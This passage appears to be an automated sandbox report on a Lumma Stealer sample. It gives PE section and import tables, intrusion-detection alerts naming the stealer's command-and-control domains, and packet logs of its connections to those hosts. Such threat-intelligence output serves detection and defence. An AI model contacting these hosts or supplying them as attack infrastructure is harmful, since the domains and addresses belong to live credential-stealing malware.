                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ab880x40.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x230000x128.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x10000x2109b0x21200fc39cf76189ab7c227ec12f73e6a3932False0.5790683962264151data6.629638369205259IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .rdata0x230000xa0040xa2007ae763a2ed0268467b431e4f40185ebfFalse0.42879533179012347data4.914287343080596IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .data0x2e0000x5796c0x56a00dabe9cdbf081fb2f304d89bb59671932False0.9913109893578643DOS executable (block device driver \377\377\377\377)7.992943735511485IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .reloc0x860000x1bf00x1c000190908279e9d6b3b648ee70a4a85ce4False0.7565569196428571data6.538484011809682IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                    .rsrc0x880000x1280x200239a18c31ff02bce8aaacba8dc7cd677False0.291015625data1.5878130901584442IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    MUI0x880600xc8dataEnglishUnited States0.535
                                                                                                                    DLLImport
                                                                                                                    KERNEL32.dllTlsFree, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap, HeapSize, WriteConsoleW
                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                    EnglishUnited States
                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2024-10-12T22:36:02.740997+02002056572ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (widdensmoywi .sbs)1192.168.2.6559881.1.1.153UDP
                                                                                                                    2024-10-12T22:36:03.254074+02002056573ET MALWARE Observed Win32/Lumma Stealer Related Domain (widdensmoywi .sbs in TLS SNI)1192.168.2.649710104.21.8.37443TCP
                                                                                                                    2024-10-12T22:36:03.754512+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649710104.21.8.37443TCP
                                                                                                                    2024-10-12T22:36:03.754512+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649710104.21.8.37443TCP
                                                                                                                    2024-10-12T22:36:03.762048+02002056570ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs)1192.168.2.6644931.1.1.153UDP
                                                                                                                    2024-10-12T22:36:04.269367+02002056571ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI)1192.168.2.649713188.114.96.3443TCP
                                                                                                                    2024-10-12T22:36:04.696511+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649713188.114.96.3443TCP
                                                                                                                    2024-10-12T22:36:04.696511+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649713188.114.96.3443TCP
                                                                                                                    2024-10-12T22:36:04.698408+02002056568ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs)1192.168.2.6537861.1.1.153UDP
                                                                                                                    2024-10-12T22:36:04.758725+02002056566ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs)1192.168.2.6503811.1.1.153UDP
                                                                                                                    2024-10-12T22:36:05.271502+02002056567ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI)1192.168.2.649715104.21.33.249443TCP
                                                                                                                    2024-10-12T22:36:05.691027+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649715104.21.33.249443TCP
                                                                                                                    2024-10-12T22:36:05.691027+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649715104.21.33.249443TCP
                                                                                                                    2024-10-12T22:36:05.716570+02002056564ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs)1192.168.2.6502221.1.1.153UDP
                                                                                                                    2024-10-12T22:36:06.214986+02002056565ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI)1192.168.2.649718172.67.205.156443TCP
                                                                                                                    2024-10-12T22:36:06.659354+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649718172.67.205.156443TCP
                                                                                                                    2024-10-12T22:36:06.659354+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649718172.67.205.156443TCP
                                                                                                                    2024-10-12T22:36:06.687782+02002056562ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs)1192.168.2.6518431.1.1.153UDP
                                                                                                                    2024-10-12T22:36:07.184611+02002056563ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI)1192.168.2.649720172.67.140.193443TCP
                                                                                                                    2024-10-12T22:36:07.640105+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649720172.67.140.193443TCP
                                                                                                                    2024-10-12T22:36:07.640105+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649720172.67.140.193443TCP
                                                                                                                    2024-10-12T22:36:07.803851+02002056560ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs)1192.168.2.6631491.1.1.153UDP
                                                                                                                    2024-10-12T22:36:08.298990+02002056561ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI)1192.168.2.649721172.67.173.224443TCP
                                                                                                                    2024-10-12T22:36:08.737000+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649721172.67.173.224443TCP
                                                                                                                    2024-10-12T22:36:08.737000+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649721172.67.173.224443TCP
                                                                                                                    2024-10-12T22:36:08.748838+02002056558ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs)1192.168.2.6583541.1.1.153UDP
                                                                                                                    2024-10-12T22:36:09.254568+02002056559ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI)1192.168.2.649732104.21.79.35443TCP
                                                                                                                    2024-10-12T22:36:09.687676+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649732104.21.79.35443TCP
                                                                                                                    2024-10-12T22:36:09.687676+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649732104.21.79.35443TCP
                                                                                                                    2024-10-12T22:36:09.689166+02002056556ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs)1192.168.2.6501351.1.1.153UDP
                                                                                                                    2024-10-12T22:36:10.181687+02002056557ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI)1192.168.2.649738188.114.96.3443TCP
                                                                                                                    2024-10-12T22:36:10.665845+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649738188.114.96.3443TCP
                                                                                                                    2024-10-12T22:36:10.665845+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649738188.114.96.3443TCP
                                                                                                                    2024-10-12T22:36:12.025576+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.649744104.102.49.254443TCP
                                                                                                                    2024-10-12T22:36:12.787291+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649755172.67.206.204443TCP
                                                                                                                    2024-10-12T22:36:12.787291+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649755172.67.206.204443TCP
                                                                                                                    2024-10-12T22:36:13.768308+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649761172.67.206.204443TCP
                                                                                                                    2024-10-12T22:36:13.768308+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649761172.67.206.204443TCP
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Oct 12, 2024 22:36:02.761759043 CEST49710443192.168.2.6104.21.8.37
                                                                                                                    Oct 12, 2024 22:36:02.761857033 CEST44349710104.21.8.37192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:02.761965036 CEST49710443192.168.2.6104.21.8.37
                                                                                                                    Oct 12, 2024 22:36:02.764779091 CEST49710443192.168.2.6104.21.8.37
                                                                                                                    Oct 12, 2024 22:36:02.764817953 CEST44349710104.21.8.37192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:03.253983974 CEST44349710104.21.8.37192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:03.254074097 CEST49710443192.168.2.6104.21.8.37
                                                                                                                    Oct 12, 2024 22:36:03.257694006 CEST49710443192.168.2.6104.21.8.37
                                                                                                                    Oct 12, 2024 22:36:03.257726908 CEST44349710104.21.8.37192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:03.258145094 CEST44349710104.21.8.37192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:03.299910069 CEST49710443192.168.2.6104.21.8.37
                                                                                                                    Oct 12, 2024 22:36:03.344490051 CEST49710443192.168.2.6104.21.8.37
                                                                                                                    Oct 12, 2024 22:36:03.344568014 CEST49710443192.168.2.6104.21.8.37
                                                                                                                    Oct 12, 2024 22:36:03.344873905 CEST44349710104.21.8.37192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:03.754520893 CEST44349710104.21.8.37192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:03.754636049 CEST44349710104.21.8.37192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:03.754856110 CEST49710443192.168.2.6104.21.8.37
                                                                                                                    Oct 12, 2024 22:36:03.757123947 CEST49710443192.168.2.6104.21.8.37
                                                                                                                    Oct 12, 2024 22:36:03.757168055 CEST44349710104.21.8.37192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:03.776572943 CEST49713443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:03.776601076 CEST44349713188.114.96.3192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:03.776684999 CEST49713443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:03.776997089 CEST49713443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:03.777009964 CEST44349713188.114.96.3192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:04.269290924 CEST44349713188.114.96.3192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:04.269366980 CEST49713443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:04.272433996 CEST49713443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:04.272439957 CEST44349713188.114.96.3192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:04.272753000 CEST44349713188.114.96.3192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:04.273978949 CEST49713443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:04.274008989 CEST49713443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:04.274049997 CEST44349713188.114.96.3192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:04.696587086 CEST44349713188.114.96.3192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:04.696839094 CEST44349713188.114.96.3192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:04.697031021 CEST49713443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:04.697031021 CEST49713443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:04.697056055 CEST49713443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:04.697068930 CEST44349713188.114.96.3192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:04.778259039 CEST49715443192.168.2.6104.21.33.249
                                                                                                                    Oct 12, 2024 22:36:04.778295040 CEST44349715104.21.33.249192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:04.778369904 CEST49715443192.168.2.6104.21.33.249
                                                                                                                    Oct 12, 2024 22:36:04.778633118 CEST49715443192.168.2.6104.21.33.249
                                                                                                                    Oct 12, 2024 22:36:04.778650999 CEST44349715104.21.33.249192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:05.271425962 CEST44349715104.21.33.249192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:05.271502018 CEST49715443192.168.2.6104.21.33.249
                                                                                                                    Oct 12, 2024 22:36:05.273128986 CEST49715443192.168.2.6104.21.33.249
                                                                                                                    Oct 12, 2024 22:36:05.273142099 CEST44349715104.21.33.249192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:05.273665905 CEST44349715104.21.33.249192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:05.274866104 CEST49715443192.168.2.6104.21.33.249
                                                                                                                    Oct 12, 2024 22:36:05.274893045 CEST49715443192.168.2.6104.21.33.249
                                                                                                                    Oct 12, 2024 22:36:05.274957895 CEST44349715104.21.33.249192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:05.691011906 CEST44349715104.21.33.249192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:05.691126108 CEST44349715104.21.33.249192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:05.691174030 CEST49715443192.168.2.6104.21.33.249
                                                                                                                    Oct 12, 2024 22:36:05.691297054 CEST49715443192.168.2.6104.21.33.249
                                                                                                                    Oct 12, 2024 22:36:05.691313028 CEST44349715104.21.33.249192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:05.691328049 CEST49715443192.168.2.6104.21.33.249
                                                                                                                    Oct 12, 2024 22:36:05.691334009 CEST44349715104.21.33.249192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:05.735729933 CEST49718443192.168.2.6172.67.205.156
                                                                                                                    Oct 12, 2024 22:36:05.735826015 CEST44349718172.67.205.156192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:05.735908985 CEST49718443192.168.2.6172.67.205.156
                                                                                                                    Oct 12, 2024 22:36:05.736316919 CEST49718443192.168.2.6172.67.205.156
                                                                                                                    Oct 12, 2024 22:36:05.736354113 CEST44349718172.67.205.156192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:06.214900017 CEST44349718172.67.205.156192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:06.214986086 CEST49718443192.168.2.6172.67.205.156
                                                                                                                    Oct 12, 2024 22:36:06.216758966 CEST49718443192.168.2.6172.67.205.156
                                                                                                                    Oct 12, 2024 22:36:06.216770887 CEST44349718172.67.205.156192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:06.217180967 CEST44349718172.67.205.156192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:06.218465090 CEST49718443192.168.2.6172.67.205.156
                                                                                                                    Oct 12, 2024 22:36:06.218496084 CEST49718443192.168.2.6172.67.205.156
                                                                                                                    Oct 12, 2024 22:36:06.218559027 CEST44349718172.67.205.156192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:06.659476042 CEST44349718172.67.205.156192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:06.659725904 CEST44349718172.67.205.156192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:06.659801960 CEST49718443192.168.2.6172.67.205.156
                                                                                                                    Oct 12, 2024 22:36:06.660048008 CEST49718443192.168.2.6172.67.205.156
                                                                                                                    Oct 12, 2024 22:36:06.660070896 CEST44349718172.67.205.156192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:06.660083055 CEST49718443192.168.2.6172.67.205.156
                                                                                                                    Oct 12, 2024 22:36:06.660089970 CEST44349718172.67.205.156192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:06.703908920 CEST49720443192.168.2.6172.67.140.193
                                                                                                                    Oct 12, 2024 22:36:06.703938961 CEST44349720172.67.140.193192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:06.704164028 CEST49720443192.168.2.6172.67.140.193
                                                                                                                    Oct 12, 2024 22:36:06.704509020 CEST49720443192.168.2.6172.67.140.193
                                                                                                                    Oct 12, 2024 22:36:06.704523087 CEST44349720172.67.140.193192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:07.184547901 CEST44349720172.67.140.193192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:07.184611082 CEST49720443192.168.2.6172.67.140.193
                                                                                                                    Oct 12, 2024 22:36:07.187165022 CEST49720443192.168.2.6172.67.140.193
                                                                                                                    Oct 12, 2024 22:36:07.187176943 CEST44349720172.67.140.193192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:07.187699080 CEST44349720172.67.140.193192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:07.197987080 CEST49720443192.168.2.6172.67.140.193
                                                                                                                    Oct 12, 2024 22:36:07.198009014 CEST49720443192.168.2.6172.67.140.193
                                                                                                                    Oct 12, 2024 22:36:07.198148012 CEST44349720172.67.140.193192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:07.640028000 CEST44349720172.67.140.193192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:07.640280008 CEST44349720172.67.140.193192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:07.640340090 CEST49720443192.168.2.6172.67.140.193
                                                                                                                    Oct 12, 2024 22:36:07.800942898 CEST49720443192.168.2.6172.67.140.193
                                                                                                                    Oct 12, 2024 22:36:07.800971985 CEST44349720172.67.140.193192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:07.800986052 CEST49720443192.168.2.6172.67.140.193
                                                                                                                    Oct 12, 2024 22:36:07.800993919 CEST44349720172.67.140.193192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:07.821952105 CEST49721443192.168.2.6172.67.173.224
                                                                                                                    Oct 12, 2024 22:36:07.821986914 CEST44349721172.67.173.224192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:07.822050095 CEST49721443192.168.2.6172.67.173.224
                                                                                                                    Oct 12, 2024 22:36:07.822560072 CEST49721443192.168.2.6172.67.173.224
                                                                                                                    Oct 12, 2024 22:36:07.822685003 CEST44349721172.67.173.224192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:08.298876047 CEST44349721172.67.173.224192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:08.298990011 CEST49721443192.168.2.6172.67.173.224
                                                                                                                    Oct 12, 2024 22:36:08.300647974 CEST49721443192.168.2.6172.67.173.224
                                                                                                                    Oct 12, 2024 22:36:08.300663948 CEST44349721172.67.173.224192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:08.301018953 CEST44349721172.67.173.224192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:08.307130098 CEST49721443192.168.2.6172.67.173.224
                                                                                                                    Oct 12, 2024 22:36:08.307172060 CEST49721443192.168.2.6172.67.173.224
                                                                                                                    Oct 12, 2024 22:36:08.307266951 CEST44349721172.67.173.224192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:08.737035990 CEST44349721172.67.173.224192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:08.737282038 CEST44349721172.67.173.224192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:08.737427950 CEST49721443192.168.2.6172.67.173.224
                                                                                                                    Oct 12, 2024 22:36:08.737529039 CEST49721443192.168.2.6172.67.173.224
                                                                                                                    Oct 12, 2024 22:36:08.737552881 CEST44349721172.67.173.224192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:08.737606049 CEST49721443192.168.2.6172.67.173.224
                                                                                                                    Oct 12, 2024 22:36:08.737612963 CEST44349721172.67.173.224192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:08.766403913 CEST49732443192.168.2.6104.21.79.35
                                                                                                                    Oct 12, 2024 22:36:08.766426086 CEST44349732104.21.79.35192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:08.766505003 CEST49732443192.168.2.6104.21.79.35
                                                                                                                    Oct 12, 2024 22:36:08.766829967 CEST49732443192.168.2.6104.21.79.35
                                                                                                                    Oct 12, 2024 22:36:08.766844988 CEST44349732104.21.79.35192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:09.254462004 CEST44349732104.21.79.35192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:09.254568100 CEST49732443192.168.2.6104.21.79.35
                                                                                                                    Oct 12, 2024 22:36:09.256444931 CEST49732443192.168.2.6104.21.79.35
                                                                                                                    Oct 12, 2024 22:36:09.256453991 CEST44349732104.21.79.35192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:09.256855965 CEST44349732104.21.79.35192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:09.258012056 CEST49732443192.168.2.6104.21.79.35
                                                                                                                    Oct 12, 2024 22:36:09.258032084 CEST49732443192.168.2.6104.21.79.35
                                                                                                                    Oct 12, 2024 22:36:09.258096933 CEST44349732104.21.79.35192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:09.687655926 CEST44349732104.21.79.35192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:09.687818050 CEST44349732104.21.79.35192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:09.687877893 CEST49732443192.168.2.6104.21.79.35
                                                                                                                    Oct 12, 2024 22:36:09.688024044 CEST49732443192.168.2.6104.21.79.35
                                                                                                                    Oct 12, 2024 22:36:09.688040018 CEST44349732104.21.79.35192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:09.688050032 CEST49732443192.168.2.6104.21.79.35
                                                                                                                    Oct 12, 2024 22:36:09.688055038 CEST44349732104.21.79.35192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:09.700063944 CEST49738443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:09.700114965 CEST44349738188.114.96.3192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:09.700221062 CEST49738443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:09.700529099 CEST49738443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:09.700547934 CEST44349738188.114.96.3192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:10.181606054 CEST44349738188.114.96.3192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:10.181687117 CEST49738443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:10.231357098 CEST49738443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:10.231376886 CEST44349738188.114.96.3192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:10.232609987 CEST44349738188.114.96.3192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:10.245861053 CEST49738443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:10.245882034 CEST49738443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:10.245954037 CEST44349738188.114.96.3192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:10.665915012 CEST44349738188.114.96.3192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:10.666182995 CEST44349738188.114.96.3192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:10.666260004 CEST49738443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:10.666312933 CEST49738443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:10.666337967 CEST44349738188.114.96.3192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:10.666352034 CEST49738443192.168.2.6188.114.96.3
                                                                                                                    Oct 12, 2024 22:36:10.666359901 CEST44349738188.114.96.3192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:10.675149918 CEST49744443192.168.2.6104.102.49.254
                                                                                                                    Oct 12, 2024 22:36:10.675182104 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:10.675246000 CEST49744443192.168.2.6104.102.49.254
                                                                                                                    Oct 12, 2024 22:36:10.675540924 CEST49744443192.168.2.6104.102.49.254
                                                                                                                    Oct 12, 2024 22:36:10.675558090 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:11.390243053 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:11.390521049 CEST49744443192.168.2.6104.102.49.254
                                                                                                                    Oct 12, 2024 22:36:11.392092943 CEST49744443192.168.2.6104.102.49.254
                                                                                                                    Oct 12, 2024 22:36:11.392100096 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:11.392422915 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:11.393670082 CEST49744443192.168.2.6104.102.49.254
                                                                                                                    Oct 12, 2024 22:36:11.435406923 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.025593996 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.025626898 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.025649071 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.025701046 CEST49744443192.168.2.6104.102.49.254
                                                                                                                    Oct 12, 2024 22:36:12.025717020 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.025754929 CEST49744443192.168.2.6104.102.49.254
                                                                                                                    Oct 12, 2024 22:36:12.025785923 CEST49744443192.168.2.6104.102.49.254
                                                                                                                    Oct 12, 2024 22:36:12.156086922 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.156115055 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.156157017 CEST49744443192.168.2.6104.102.49.254
                                                                                                                    Oct 12, 2024 22:36:12.156167984 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.156186104 CEST49744443192.168.2.6104.102.49.254
                                                                                                                    Oct 12, 2024 22:36:12.156213999 CEST49744443192.168.2.6104.102.49.254
                                                                                                                    Oct 12, 2024 22:36:12.163093090 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.163155079 CEST49744443192.168.2.6104.102.49.254
                                                                                                                    Oct 12, 2024 22:36:12.163271904 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.163322926 CEST49744443192.168.2.6104.102.49.254
                                                                                                                    Oct 12, 2024 22:36:12.163326979 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.163361073 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.163361073 CEST49744443192.168.2.6104.102.49.254
                                                                                                                    Oct 12, 2024 22:36:12.163387060 CEST49744443192.168.2.6104.102.49.254
                                                                                                                    Oct 12, 2024 22:36:12.163393021 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.163400888 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.163409948 CEST49744443192.168.2.6104.102.49.254
                                                                                                                    Oct 12, 2024 22:36:12.163414001 CEST44349744104.102.49.254192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.176151037 CEST49755443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:12.176189899 CEST44349755172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.176276922 CEST49755443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:12.176600933 CEST49755443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:12.176620007 CEST44349755172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.661891937 CEST44349755172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.661978960 CEST49755443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:12.663312912 CEST49755443192.168.2.6172.67.206.204
